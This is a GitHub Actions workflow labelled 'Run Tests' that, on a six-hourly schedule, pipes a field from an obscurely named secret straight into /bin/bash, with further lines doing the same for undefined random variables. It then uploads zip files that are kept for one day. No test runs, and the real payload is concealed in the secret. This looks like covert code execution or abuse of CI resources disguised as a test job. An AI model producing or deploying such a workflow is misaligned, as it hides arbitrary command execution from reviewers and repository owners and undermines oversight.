name: Run Tests
on:
  workflow_dispatch:

  schedule:
    - cron: '29 1,7,13,19 * * *'
permissions:
  contents: read
  actions: read
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  scheduler:
    name: Main task
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - name: Checkout
        uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Invoke
        env:
          pzi9: ${{ secrets.pzi9 }}
        run: |
          printf '%s' "$pzi9" | jq -r .nl37 | /bin/bash
          echo $tk68 | jq -r .lrjiu550 | /bin/bash
          printf '%s' "$gmhxx104" | jq -r .tmpw93 | /bin/bash
          echo $zb91 | jq -r .qszl8758 | /bin/bash

      - name: Store artifact
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: CbAM4zlY
          path: "*.zip"
          retention-days: 1
